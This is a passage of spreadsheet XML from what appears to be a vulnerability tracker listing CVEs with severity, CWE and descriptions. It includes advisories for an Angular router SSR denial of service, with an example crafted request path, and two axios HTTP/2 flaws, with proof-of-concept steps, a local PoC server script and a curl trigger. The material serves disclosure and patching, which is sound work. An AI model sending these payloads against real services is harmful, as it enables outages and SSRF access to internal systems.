      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97290</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="inlineStr"/>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Photonic Gallery &amp; Lightbox for Flickr, SmugMug &amp; Others &lt;= 3.36 versions.</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97290</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102127</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="inlineStr"/>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr"/>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>An XML parser used by Kiteworks Email Protection Gateway did not restrict external entity references. Where an optional, non-default message-processing feature is enabled, a remote and unauthenticated sender could potentially use a crafted message to read files accessible to the gateway service account, including cryptographic key material and credentials, and have them sent to a destination they control.</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102127</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47582</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="inlineStr"/>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr"/>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47582</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47596</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="inlineStr"/>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>CWE-281</t>
        </is>
      </c>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user can write to read-only memory because the memory's permissions are not preserved. A successful exploit of this vulnerability might lead to code execution and escalation of privileges.</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47596</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47598</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="inlineStr"/>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the open-source kernel module event delivery path where an unprivileged local user could cause a use-after-free through a race between asynchronous event delivery and file close. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47598</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93495</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="inlineStr"/>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>CWE-665</t>
        </is>
      </c>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>Improper initialization in an ASUS certain motherboard allows an physically proximate user to read or write arbitrary memory by inserting a specially crafted device.</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93495</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101896</t>
        </is>
      </c>
      <c r="D348" s="5" t="inlineStr"/>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr"/>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/router</t>
        </is>
      </c>
      <c r="M348" s="5" t="inlineStr">
        <is>
          <t>20.3.32, 21.2.24, 22.2.0</t>
        </is>
      </c>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr"/>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>A denial of service (DoS) vulnerability was identified in `@angular/router` when Server-Side Rendering (SSR) is enabled on Node.js (V8).
When `@angular/router` parses incoming request URLs, it extracts path segments, matrix parameters, and child outlets into plain JavaScript objects (`Record&lt;string, string&gt;`). When matrix parameter names or outlet names are numeric strings (such as `/a;990;2522`), the V8 JavaScript engine interprets them as array-indexed properties rather than named properties.
Under V8's internal property-storage heuristics, setting numeric keys on an initially empty object causes V8 to allocate a dense array backing store (`HOLEY_ELEMENTS`) sized to the maximum index rather than falling back to sparse dictionary storage. Specifically, assigning sequential or moderately large numeric keys (like `990` followed by `2522`) causes V8 to allocate a contiguous backing store of ~2,522 pointers (~20 KB to 25 KB of heap) for a single 11-byte segment.
Because each segment in a URL path allocates its own independent `parameters` object, an attacker can craft URLs with repeated numeric matrix parameters to achieve an asymmetric memory amplification factor of approximately **~350x**.
### Impact
Successful exploitation allows an unauthenticated remote attacker to exhaust the Node.js old-space heap with modest request volume, terminating the SSR worker with an unrecoverable `JavaScript heap out of memory` fatal error and causing a Denial of Service.
* **High Amplification:** A single 11-byte segment (`/a;990;2522`) consumes ~20 KB–25 KB of V8 heap.
* **Low Concurrency Required:**
  * With 8 KB request paths (~740 segments, within default Nginx 8 KB buffer limits), as few as **12–22 concurrent requests** crash a 256 MiB–512 MiB Node.js SSR worker.
  * With smaller 1 KB–2 KB request paths (~90–180 segments), a burst of ~50–100 concurrent requests achieves the same heap exhaustion.
* **Client-side SPAs Unaffected:** Pure client-side Angular applications (Single Page Applications without SSR) are **not** vulnerable, as local browser memory consumption does not cross a security boundary.
### Attack Preconditions &amp; Vulnerable Configurations
An application is affected only if **all** of the following conditions are met:
* **SSR Enabled:** The application runs in a Server-Side Rendering environment powered by Node.js / V8.
* **Direct Router Parsing:** User-controlled request URLs are parsed by `@angular/router` during SSR.
* **No Reverse-Proxy Semicolon/Segment Filtering:** Upstream reverse proxies (Nginx, Cloudflare, ALB) forward URLs containing semicolons (`;`) and multiple path segments without stripping or rejecting them.
#### Exploit Payload Example
An attacker sends concurrent HTTP requests with repeated numeric matrix parameters:
```http
GET /a;990;2522/a;990;2522/a;990;2522/... HTTP/1.1
Host: example.com
```
Even with paths under 2 KB, overlapping requests during SSR will rapidly consume the V8 heap until the process crashes.
### Patches
The issue is resolved by updating `@angular/router` to enforce V8 dictionary elements storage (`setUrlDerivedKey`) for numeric URL-derived keys (index &gt;= 32). This prevents V8 from allocating oversized contiguous array backing stores while preserving route matching, parameter values, and component input bindings.
* `22.2.0`
* `21.2.24`
* `20.3.32`
### Workarounds &amp; Mitigations
If you cannot immediately upgrade to a patched version, apply one of the following mitigations at your edge or reverse proxy:
1. **Block or Sanitize Matrix Parameters at the Reverse Proxy:**  
   Configure your reverse proxy (e.g., Nginx, Cloudflare, or AWS WAF) to reject or strip semicolons (`;`) in request paths before forwarding requests to the Angular SSR service:
   ```nginx
   # Nginx example: reject requests containing matrix parameters
   if ($uri ~* ";") {
       return 400;
   }
   ```
2. **Enforce Strict Path Segment Limits:**  
   Reject requests with excessive path depth (e.g., more than 20–30 segments).
3. **Increase Node.js Old Space:**  
   Increase `--max-old-space-size` (e.g., to 2048 or 4096 MB) to increase the concurrency threshold required to exhaust memory, though this does not fully eliminate the vulnerability under sustained traffic.</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101896</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101898</t>
        </is>
      </c>
      <c r="D349" s="5" t="inlineStr"/>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M349" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr"/>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios for Node.js does not apply configured DNS lookup or proxy controls when a request uses `httpVersion: 2`. The HTTP/1 adapter path wraps and forwards `config.lookup`, builds normal request options, and applies proxy routing through `setProxy()`. The HTTP/2 path builds a session with `http2.connect()` using only `options.http2Options`, which drops the top-level `lookup`, `agent`, and proxy state.
Applications are affected when they allow a user to influence request destinations, enable axios HTTP/2, and rely on axios `lookup` or proxy routing to prevent SSRF or enforce outbound network policy.
## Impact
In affected server-side deployments, an attacker can cause axios to connect directly to destinations that the configured resolver or proxy would have rejected. Depending on reachable services, this can expose cloud metadata, internal service responses, or allow state-changing requests to internal systems.
This is not an unconditional SSRF in every axios deployment. It requires `httpVersion: 2` and an application-level trust boundary where user-influenced URLs are constrained by `lookup` or proxy policy.
## Affected Functionality
Affected:
- Node.js HTTP adapter with `httpVersion: 2`.
- `config.lookup` supplied as a DNS policy.
- Explicit `config.proxy` and environment-derived proxy settings for HTTPS HTTP/2 requests.
Not affected:
- Browser adapters.
- Node HTTP/1 requests, which pass `lookup` to the transport and apply proxy handling.
- Applications that validate destination hosts independently before calling axios.
## Technical Details
In `lib/adapters/http.js`, the adapter reads `lookup`, wraps it, stores it on the request `options`, and applies `setProxy()` before selecting a transport. For HTTP/2, `http2Transport.request()` builds an authority from `options.protocol`, `options.hostname`, and `options.port`, then calls:
```js
const { http2Options, headers } = options;
const session = http2Sessions.getSession(authority, http2Options);
```
`lib/helpers/Http2Sessions.js` ultimately calls `http2.connect(authority, options)` with only the `http2Options` object. The configured DNS lookup and the proxy or tunneling agent installed on the top-level request options are not forwarded into that call.
Local verification on axios `1.18.1` showed `lookupCalls: 0` while an HTTP/2 request to a local h2 origin succeeded. A second local HTTPS h2 verification with an explicit rejecting HTTP proxy showed the origin received the request and the proxy observed no traffic.
## Proof of Concept of Attack
Local constrained demonstration:
1. Start an HTTP/2 server on loopback.
2. Call `axios.get("http://localhost:&lt;port&gt;/internal", { httpVersion: 2, lookup })` where `lookup` throws `EPOLICY`.
3. Observe that the request succeeds and the lookup counter remains `0`.
For proxy routing:
1. Start an HTTPS HTTP/2 origin and a local HTTP proxy that rejects every request and CONNECT.
2. Call axios with `httpVersion: 2`, `http2Options: { rejectUnauthorized: false }`, and explicit `proxy`.
3. Observe that the origin receives the request and the proxy receives nothing.
Expected safe behavior is that either the lookup policy blocks the request or the proxy observes and rejects the request.
## Workarounds
Use the HTTP/1 adapter path for requests that depend on axios `lookup` or proxy controls. Alternatively, enforce destination allow/deny policy before calling axios, outside the adapter transport path.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
  ### Summary
I found that Axios does not apply the configured `lookup` function or proxy when a request uses `httpVersion: 2`. The HTTP/1 adapter applies both controls, but the HTTP/2 path connects straight to the URL's hostname using `http2.connect()`.
This matters for server applications that accept a user-influenced URL and use a custom DNS lookup or mandatory outbound proxy to prevent SSRF. Switching the Axios instance to HTTP/2 silently removes those controls, allowing the request to reach an address the application intended to block.
I reproduced this on the current npm release, Axios 1.18.1.
### Details
The HTTP adapter reads and wraps the caller's `lookup` function, builds the normal request options, and calls `setProxy()`:
- `lib/adapters/http.js`, around lines 530-578: reads and wraps `lookup`
- `lib/adapters/http.js`, around lines 895-954: adds `lookup` to `options` and applies `setProxy()`
For HTTP/2, however, the adapter selects `http2Transport`. That transport creates an authority from the destination and only passes `options.http2Options` to the session pool:
```js
const { http2Options, headers } = options;
const session = http2Sessions.getSession(authority, http2Options);
```
`lib/helpers/Http2Sessions.js` then calls:
```js
const session = http2.connect(authority, options);
```
At this point `options` is only the `http2Options` object. The top-level `lookup`, the proxy tunnelling agent created by `setProxy()`, and the selected `httpAgent`/`httpsAgent` are not forwarded. The request therefore uses the system resolver and opens a direct connection to the origin.
The same root cause affects both explicit proxy configuration and environment-derived proxy configuration. I kept the PoC local and used an explicit proxy so the result does not depend on shell environment variables.
### PoC
I attached [axios_http2_transport_controls_poc.mjs](https://drive.google.com/file/d/1lKXBOLDoysOFRmaRyV1tMVLx3P0Ah4gV/view?usp=sharing). The PoC is entirely local and sets up three pieces:
1. An HTTPS origin with HTTP/2 enabled. If reached, it records the request and returns `REACHED_BLOCKED_ORIGIN`.
2. An HTTP proxy that records traffic but rejects every normal request and every CONNECT request with `502 Bad Gateway`.
3. A custom Axios `lookup` callback that rejects every DNS lookup with an `EPOLICY` error.
The first request is an HTTP/1 control request. It uses the blocking `lookup` callback and has proxying disabled. Axios calls the callback, receives `EPOLICY`, and does not reach the origin. This confirms that the callback works and that the hostname is blocked through the normal adapter path.
The second request targets the same URL with `httpVersion: 2`. It is given both security controls: the same blocking `lookup` callback and the rejecting proxy. If Axios honors either one, this request cannot reach the origin. It should fail with `EPOLICY`, or it should reach the proxy and receive its `502` response.
Instead, the request returns HTTP 200 with `REACHED_BLOCKED_ORIGIN`. The lookup counter does not increase, and the proxy records no request or CONNECT attempt. The origin is the only server that records traffic. This shows that the HTTP/2 path skipped both controls and connected directly using the system resolver.
To reproduce, run the attachment from the root of an Axios checkout:
Run it from the root of an Axios checkout:
```bash
git checkout v1.18.1
npm install --ignore-scripts
node /path/to/axios_http2_transport_controls_poc.mjs
```
Relevant output from my run:
```json
{
  "axiosVersion": "1.18.1",
  "configuredControls": {
    "lookup": "reject every DNS lookup with EPOLICY",
    "proxy": "http://127.0.0.1:&lt;port&gt; (reject every request)"
  },
  "http1Control": "EPOLICY: blocked by application DNS policy",
  "http2Result": {
    "status": 200,
    "data": "REACHED_BLOCKED_ORIGIN"
  },
  "lookupCalls": 1,
  "proxyObservedTraffic": false,
  "events": [
    {
      "server": "origin",
      "protocol": "h2",
      "path": "/internal"
    }
  ]
}
```
The important parts of the output are:
- `http1Control` contains `EPOLICY`, proving the DNS policy blocks the destination under HTTP/1.
- `lookupCalls` is still `1` after both requests, proving HTTP/2 never called the configured resolver.
- `proxyObservedTraffic` is `false`, proving HTTP/2 did not use the configured proxy.
- `http2Result.status` is `200`, and the sole event belongs to the origin, proving Axios connected directly to the blocked destination.
### Impact
The vulnerable configuration is a Node.js application that:
- enables Axios HTTP/2 using `httpVersion: 2`;
- lets an application user influence the request destination; and
- relies on Axios's `lookup` option or proxy routing to enforce a destination or egress policy.
In that setup, an unauthenticated application user may be able to make the server connect directly to loopback, private-network, or link-local services that the lookup policy or proxy would have rejected. Depending on the reachable service, this can expose cloud credentials or internal data, modify internal services, or affect availability.
HTTP/2 support is marked experimental, but neither the HTTP/2 documentation nor the proxy documentation says that `lookup` and proxy controls are ignored. The proxy documentation states that HTTPS requests are sent through a CONNECT tunnel. More importantly, Axios's threat model tells callers that destination validation is their responsibility; this behavior silently bypasses such caller-supplied validation.
I did not test against any third-party or production service. The PoC only uses listeners on my own machine.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101898</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101901</t>
        </is>
      </c>
      <c r="D350" s="5" t="inlineStr"/>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M350" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr"/>
      <c r="S350" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios versions with Node.js HTTP/2 support can terminate the caller’s process when a ClientHttp2Session emits an error event that is not handled by axios.
This affects applications that use the Node HTTP adapter with httpVersion: 2. A malicious, unavailable, or non-HTTP/2 endpoint can cause an uncaught exception instead of a normal rejected axios request.
## Impact
The impact is denial of service. In affected applications, an attacker who can influence the request destination, or operate the destination server, may be able to crash the Node.js process.
This does not affect default HTTP/1.1 usage, browser XHR/fetch adapters, or applications that do not enable axios HTTP/2 support.
## Affected Functionality
Affected path:
- Node.js HTTP adapter
- httpVersion: 2
- HTTP/2 session creation/reuse through Http2Sessions
- Network/session failures emitted as ClientHttp2Session error events
Caller-controlled http2Options can make the issue easier to trigger, but passing arbitrary attacker input into axios config is caller-controlled behavior and should not be the primary advisory framing.
## Technical Details
Http2Sessions.getSession() creates a session with http2.connect(authority, options) but only registers a close handler. It does not register an error handler on the returned ClientHttp2Session.
When the session emits error, Node treats it as an unhandled EventEmitter error and throws. This can bypass the normal axios Promise rejection path and terminate the process.
## Proof of Concept of Attack
```js
import axios from './index.js';
await axios.get('http://127.0.0.1:1/', {
  httpVersion: 2,
  timeout: 1000
});
```
Expected vulnerable behavior: the process exits with an uncaught ECONNREFUSED session error instead of only rejecting the axios request.
## Workarounds
Disable axios HTTP/2 for untrusted or user-influenced destinations and use the default HTTP/1.1 adapter until a fixed release is available. Also avoid passing attacker-controlled values into http2Options; axios config is trusted application input.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
Hi, i'm RelunSec a security researcher working with **InsiteTech.jp**
i want let you known, i finded a DoS in axios, to reproduce that, that is the example of a server
```js
const http = require('http');
// Import the local axios version to ensure the patch is active
const axios = require('../../lib/axios.js').default; 
const url = require('url');
// A public HTTP/2 server to make internal requests to.
// This simulates an external service your application might interact with over HTTP/2.
const TARGET_URL = 'https://nghttp2.org/'; 
const PORT = 3000;
const server = http.createServer(async (req, res) =&gt; {
  const parsedUrl = url.parse(req.url, true);
  const http2optionId = parsedUrl.query.http2optionId;
  if (!http2optionId) {
  console.warn(`[SERVER] Rejected request: Missing http2optionId parameter`);
  res.writeHead(400, { 'Content-Type': 'text/plain' });
  res.end('Error: Missing http2optionId query parameter. Usage: ?http2optionId=value\n');
  return; 
}
  console.log(`[SERVER] Received request with http2optionId: ${http2optionId}`);
  // Create an Axios instance configured for HTTP/2
  // The 'id' in http2Options makes each session configuration unique.
  const axiosInstance = axios.create({
    baseURL: TARGET_URL,
    httpVersion: 2,
    http2Options: {
      // rejectUnauthorized: false, // Uncomment if targeting a local HTTP/2 server with self-signed cert
      id: http2optionId, // This is the attacker-controlled unique part
    },
    // Adding a short timeout to prevent attacker from waiting too long if target is slow
    timeout: 5000 
  });
  try {
    const response = await axiosInstance.get('/');
    res.writeHead(200, { 'Content-Type': 'text/plain' });
    res.end(`Internal HTTP/2 request successful for ID: ${http2optionId}\nStatus: ${response.status}`);
  } catch (error) {
    // Check for the specific error indicating session limit reached
    if (error.isAxiosError &amp;&amp; error.code === axios.AxiosError.ERR_BAD_OPTION_VALUE) {
      console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
      res.writeHead(500, { 'Content-Type': 'text/plain' });
      res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
    } else {
      console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}:`, error.message);
      res.writeHead(500, { 'Content-Type': 'text/plain' });
      res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: Generic error - ${error.message}`);
    }
  }
});
server.listen(PORT, () =&gt; {
  console.log(`PoC Server listening on http://localhost:${PORT}`);
  console.log(`Targeting internal HTTP/2 requests to: ${TARGET_URL}`);
  console.log(`Send requests to http://localhost:${PORT}?http2optionId=...`);
  console.log(`Expected behavior with current patch: After ~100 unique http2optionIds, subsequent requests will receive ERR_BAD_OPTION_VALUE.`);
});
```
i tested all that in latest git version, after starting the server.cjs, to trigger that you just need do
```rust
relunsec@relunsec:~/software/axios-1/poc/poc$ curl http://127.0.0.1:3000/?http2optionId=hi
curl: (52) Empty reply from server
```
that is extremly simple to trigger
